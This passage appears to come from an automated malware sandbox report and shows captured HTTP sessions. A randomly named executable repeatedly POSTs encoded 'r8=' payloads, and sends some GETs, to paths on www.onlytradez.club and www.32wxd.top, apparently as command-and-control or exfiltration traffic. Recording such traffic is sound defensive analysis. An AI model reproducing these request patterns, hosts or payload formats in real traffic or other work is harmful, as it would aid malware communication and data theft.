                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.onlytradez.club
                                        Referer: http://www.onlytradez.club/zctj/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 199
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 67 51 47 51 34 34 70 6a 59 51 69 6a 2b 42 72 76 52 5a 4d 69 6b 4f 73 38 78 66 37 4f 59 76 59 6b 35 69 66 43 32 54 4c 36 70 76 66 4d 55 51 4a 41 77 6f 41 48 5a 34 30 73 51 4f 53 77 4b 31 32 57 71 38 39 41 6e 4d 6e 43 71 70 39 61 75 73 34 78 6f 2b 4e 63 64 39 57 70 62 4a 67 6b 72 4f 44 66 53 52 6c 46 50 6c 47 74 4f 4b 30 44 55 38 41 78 33 62 43 42 32 77 69 61 45 64 6b 38 68 44 56 4b 44 44 72 39 6e 69 47 72 42 68 6a 4a 63 72 74 79 53 67 74 6d 63 70 35 56 71 66 42 6a 62 32 51 32 69 42 4f 69 49 4e 71 77 52 6f 4f 36 57 5a 34 73 70 6d 6d 59 31 48 46 35 71 68 46 37 58 6d 38 4c 67 67 3d 3d
                                        Data Ascii: r8=gQGQ44pjYQij+BrvRZMikOs8xf7OYvYk5ifC2TL6pvfMUQJAwoAHZ40sQOSwK12Wq89AnMnCqp9aus4xo+Ncd9WpbJgkrODfSRlFPlGtOK0DU8Ax3bCB2wiaEdk8hDVKDDr9niGrBhjJcrtySgtmcp5VqfBjb2Q2iBOiINqwRoO6WZ4spmmY1HF5qhF7Xm8Lgg==
                                        Sep 3, 2024 13:54:15.743071079 CEST | 369 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.26.1
                                        Date: Tue, 03 Sep 2024 11:54:15 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Content-Encoding: gzip
                                        Data Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        10 | 192.168.2.4 | 49747 | 167.172.133.32 | 80 | 6016 | C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 3, 2024 13:54:17.846111059 CEST | 772 | OUT | POST /zctj/ HTTP/1.1
                                        Host: www.onlytradez.club
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.onlytradez.club
                                        Referer: http://www.onlytradez.club/zctj/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 219
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 67 51 47 51 34 34 70 6a 59 51 69 6a 2f 6c 58 76 53 36 55 69 7a 65 73 37 74 50 37 4f 58 50 59 6f 35 69 54 43 32 57 36 2f 70 63 37 4d 4e 79 42 41 33 5a 41 48 51 6f 30 73 62 75 53 31 4f 31 32 4a 71 38 67 39 6e 4a 66 43 71 70 70 61 75 75 67 78 70 50 4e 64 63 74 57 72 55 70 67 36 6d 75 44 66 53 52 6c 46 50 6c 44 77 4f 4b 4d 44 49 63 51 78 33 2f 57 43 38 51 69 5a 46 64 6b 38 77 7a 56 57 44 44 72 44 6e 6a 62 4f 42 6e 2f 4a 63 76 6c 79 53 78 74 35 4c 5a 35 54 33 76 42 32 65 55 6c 6c 73 67 4c 50 4f 74 75 70 4d 6f 53 63 65 2f 70 32 34 58 48 50 6e 48 68 4b 33 6d 4d 50 61 6c 42 43 37 67 66 44 6c 42 4f 4b 42 6a 44 53 53 50 4c 76 37 77 74 36 69 63 77 3d
                                        Data Ascii: r8=gQGQ44pjYQij/lXvS6Uizes7tP7OXPYo5iTC2W6/pc7MNyBA3ZAHQo0sbuS1O12Jq8g9nJfCqppauugxpPNdctWrUpg6muDfSRlFPlDwOKMDIcQx3/WC8QiZFdk8wzVWDDrDnjbOBn/JcvlySxt5LZ5T3vB2eUllsgLPOtupMoSce/p24XHPnHhK3mMPalBC7gfDlBOKBjDSSPLv7wt6icw=
                                        Sep 3, 2024 13:54:18.275681019 CEST | 369 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.26.1
                                        Date: Tue, 03 Sep 2024 11:54:18 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Content-Encoding: gzip
                                        Data Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        11 | 192.168.2.4 | 49748 | 167.172.133.32 | 80 | 6016 | C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 3, 2024 13:54:20.390868902 CEST | 10854 | OUT | POST /zctj/ HTTP/1.1
                                        Host: www.onlytradez.club
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.onlytradez.club
                                        Referer: http://www.onlytradez.club/zctj/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 10299
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 67 51 47 51 34 34 70 6a 59 51 69 6a 2f 6c 58 76 53 36 55 69 7a 65 73 37 74 50 37 4f 58 50 59 6f 35 69 54 43 32 57 36 2f 70 63 7a 4d 52 58 4e 41 30 2b 55 48 4b 6f 30 73 59 75 53 30 4f 31 32 41 71 38 34 78 6e 4a 61 31 71 72 52 61 68 72 30 78 68 64 6c 64 53 74 57 72 4d 5a 67 37 72 4f 43 4c 53 51 55 4d 50 6c 54 77 4f 4b 4d 44 49 65 34 78 67 37 43 43 76 41 69 61 45 64 6b 77 68 44 56 71 44 46 43 34 6e 6a 75 37 47 52 50 4a 63 4f 5a 79 51 43 46 35 4a 35 35 52 32 76 41 7a 65 55 34 39 73 6b 72 74 4f 75 79 54 4d 71 4f 63 64 72 41 30 6b 31 50 32 6c 78 78 30 6b 52 51 46 44 47 51 41 38 57 2f 48 31 44 2f 57 65 6a 33 62 50 63 69 33 2b 68 70 47 6a 4c 4c 54 42 6c 73 75 45 7a 78 6e 48 4a 36 72 64 4a 59 71 68 77 67 2f 67 59 50 57 33 35 36 78 6b 78 50 37 33 6e 72 55 67 6f 70 43 7a 33 58 50 35 32 43 4a 75 56 5a 44 4f 75 36 2f 67 56 7a 63 6b 61 55 69 56 51 54 6b 64 45 57 79 57 6e 33 66 47 47 66 7a 61 4a 38 46 55 34 47 6b 5a 66 48 6e 4c 48 6a 57 30 66 73 78 41 49 41 6f 37 49 38 44 32 4a 63 45 51 54 49 72 45 4d 47 [TRUNCATED]
                                        Data Ascii: r8=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 [TRUNCATED]
                                        Sep 3, 2024 13:54:20.837920904 CEST | 369 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.26.1
                                        Date: Tue, 03 Sep 2024 11:54:20 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Content-Encoding: gzip
                                        Data Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        12 | 192.168.2.4 | 49749 | 167.172.133.32 | 80 | 6016 | C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 3, 2024 13:54:22.932180882 CEST | 485 | OUT | GET /zctj/?r8=tSuw7IYRRjv+wnLSX6BcwOUAvtHef9BV3SuosHDPhpHVIQ9U3bF8KrgVZ9eofhuzjMlHgMWokK5nneJg1eEherCeW9gkiaKlQQJDWwurePQCYs04wJT4uh8=&VZ=qzwLUJ3Xbb28 HTTP/1.1
                                        Host: www.onlytradez.club
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Sep 3, 2024 13:54:23.349275112 CEST | 705 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx/1.26.1
                                        Date: Tue, 03 Sep 2024 11:54:23 GMT
                                        Content-Type: text/html
                                        Content-Length: 555
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 [TRUNCATED]
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        13 | 192.168.2.4 | 49750 | 206.119.82.116 | 80 | 6016 | C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 3, 2024 13:54:28.565115929 CEST | 734 | OUT | POST /kyiu/ HTTP/1.1
                                        Host: www.32wxd.top
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.32wxd.top
                                        Referer: http://www.32wxd.top/kyiu/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 199
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 61 42 75 4e 76 38 62 55 44 41 41 7a 47 2f 32 67 4a 79 76 75 67 42 2f 42 65 43 4a 53 2f 6e 5a 2f 37 62 67 51 31 41 61 48 42 30 55 4e 72 39 69 33 58 71 6b 4e 36 6e 47 32 44 6b 5a 73 4a 42 2b 78 38 37 78 56 30 56 31 39 5a 4b 52 4d 79 4d 78 6b 2b 4a 41 73 4b 70 61 51 6f 33 4a 71 68 74 6e 7a 41 78 38 5a 30 62 4e 5a 30 52 32 48 33 68 65 75 48 32 67 6e 52 73 61 7a 48 4e 31 6b 68 39 76 52 4e 54 31 2b 38 4e 35 6a 73 31 46 5a 4f 55 52 37 2b 38 78 4e 56 68 44 48 4a 59 46 78 45 73 6c 6a 41 51 44 66 4a 6d 62 55 4f 39 61 41 6a 67 46 68 49 6e 4e 71 63 65 63 6d 67 71 73 4d 57 56 35 66 52 41 3d 3d
                                        Data Ascii: r8=aBuNv8bUDAAzG/2gJyvugB/BeCJS/nZ/7bgQ1AaHB0UNr9i3XqkN6nG2DkZsJB+x87xV0V19ZKRMyMxk+JAsKpaQo3JqhtnzAx8Z0bNZ0R2H3heuH2gnRsazHN1kh9vRNT1+8N5js1FZOUR7+8xNVhDHJYFxEsljAQDfJmbUO9aAjgFhInNqcecmgqsMWV5fRA==
                                        Sep 3, 2024 13:54:29.417357922 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Tue, 03 Sep 2024 11:54:29 GMT
                                        Content-Type: text/html
                                        Content-Length: 548
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        14 | 192.168.2.4 | 49751 | 206.119.82.116 | 80 | 6016 | C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 3, 2024 13:54:31.120153904 CEST | 754 | OUT | POST /kyiu/ HTTP/1.1
                                        Host: www.32wxd.top
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.32wxd.top
                                        Referer: http://www.32wxd.top/kyiu/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 219
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 61 42 75 4e 76 38 62 55 44 41 41 7a 47 63 75 67 4d 52 33 75 31 52 2f 43 53 69 4a 53 30 48 5a 6a 37 62 73 51 31 42 75 58 42 43 38 4e 72 64 79 33 57 76 45 4e 35 6e 47 32 4c 45 5a 70 58 78 2b 41 38 37 38 32 30 55 4a 39 5a 4b 56 4d 79 4f 5a 6b 2f 36 6f 76 4c 35 61 57 30 33 4a 37 6c 74 6e 7a 41 78 38 5a 30 62 59 45 30 52 65 48 32 51 4f 75 56 44 41 6f 53 73 61 77 4e 74 31 6b 6c 39 75 57 4e 54 31 58 38 4d 6b 45 73 77 42 5a 4f 56 68 37 36 35 64 43 66 68 44 4e 58 6f 45 54 44 35 63 30 47 78 32 71 4b 6c 65 32 48 76 6a 69 72 47 55 37 5a 57 73 39 4f 65 34 56 39 74 6c 34 62 57 45 57 4b 49 6e 32 57 32 43 4b 36 33 5a 57 5a 42 32 5a 4e 45 70 6e 34 7a 45 3d
                                        Data Ascii: r8=aBuNv8bUDAAzGcugMR3u1R/CSiJS0HZj7bsQ1BuXBC8Nrdy3WvEN5nG2LEZpXx+A87820UJ9ZKVMyOZk/6ovL5aW03J7ltnzAx8Z0bYE0ReH2QOuVDAoSsawNt1kl9uWNT1X8MkEswBZOVh765dCfhDNXoETD5c0Gx2qKle2HvjirGU7ZWs9Oe4V9tl4bWEWKIn2W2CK63ZWZB2ZNEpn4zE=
                                        Sep 3, 2024 13:54:31.966136932 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Tue, 03 Sep 2024 11:54:31 GMT
                                        Content-Type: text/html
                                        Content-Length: 548
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        15 | 192.168.2.4 | 49752 | 206.119.82.116 | 80 | 6016 | C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 3, 2024 13:54:33.857142925 CEST | 10836 | OUT | POST /kyiu/ HTTP/1.1
                                        Host: www.32wxd.top
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.32wxd.top
                                        Referer: http://www.32wxd.top/kyiu/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 10299
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 61 42 75 4e 76 38 62 55 44 41 41 7a 47 63 75 67 4d 52 33 75 31 52 2f 43 53 69 4a 53 30 48 5a 6a 37 62 73 51 31 42 75 58 42 43 45 4e 72 4f 71 33 58 4f 45 4e 34 6e 47 32 49 45 5a 6f 58 78 2b 5a 38 37 6b 71 30 55 46 4c 5a 4a 39 4d 77 74 68 6b 34 4c 6f 76 46 35 61 57 2f 58 4a 72 68 74 6e 69 41 78 73 6a 30 62 49 45 30 52 65 48 32 53 6d 75 43 47 67 6f 55 73 61 7a 48 4e 31 67 68 39 76 78 4e 53 64 74 38 4d 67 2b 76 45 31 5a 4f 31 78 37 38 66 4a 43 5a 78 44 44 57 6f 45 31 44 35 5a 7a 47 78 72 56 4b 6d 44 62 48 73 2f 69 75 54 56 34 44 53 78 6a 66 4e 4d 66 71 38 55 65 55 55 38 42 4c 70 2b 4c 54 44 69 47 73 58 64 44 65 6a 58 56 57 77 56 50 71 31 49 6f 52 4e 64 4c 64 70 67 5a 6c 78 6f 68 2f 62 6f 39 6f 45 68 37 69 6c 34 78 53 63 34 56 42 79 43 73 59 38 59 7a 51 45 77 6b 74 37 33 5a 67 67 74 73 76 50 6f 50 62 2b 42 4c 62 56 57 52 33 4e 36 49 61 56 41 33 6c 67 49 79 4d 77 42 2f 78 67 47 4b 35 57 35 36 65 4a 62 37 43 59 37 76 62 52 6a 6c 63 69 36 4f 2b 75 4b 45 57 61 4e 61 65 4f 44 69 7a 51 62 53 68 44 4f [TRUNCATED]
                                        Data Ascii: r8=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 [TRUNCATED]
                                        Sep 3, 2024 13:54:34.722579956 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Tue, 03 Sep 2024 11:54:34 GMT
                                        Content-Type: text/html
                                        Content-Length: 548
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        16 | 192.168.2.4 | 49753 | 206.119.82.116 | 80 | 6016 | C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 3, 2024 13:54:36.399796009 CEST | 479 | OUT | GET /kyiu/?VZ=qzwLUJ3Xbb28&r8=XDGtsL25HTw6JP67Ly7M1BrbeTxg63xVn4NdqHGWC1gt1eOjH+BVmk6PIm5PWw2c27Ak8m93WqRL2MBomZszGMKw0lI8qqbvBzBP6NUCsyvYxAKvE0l8E9k= HTTP/1.1
                                        Host: www.32wxd.top
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
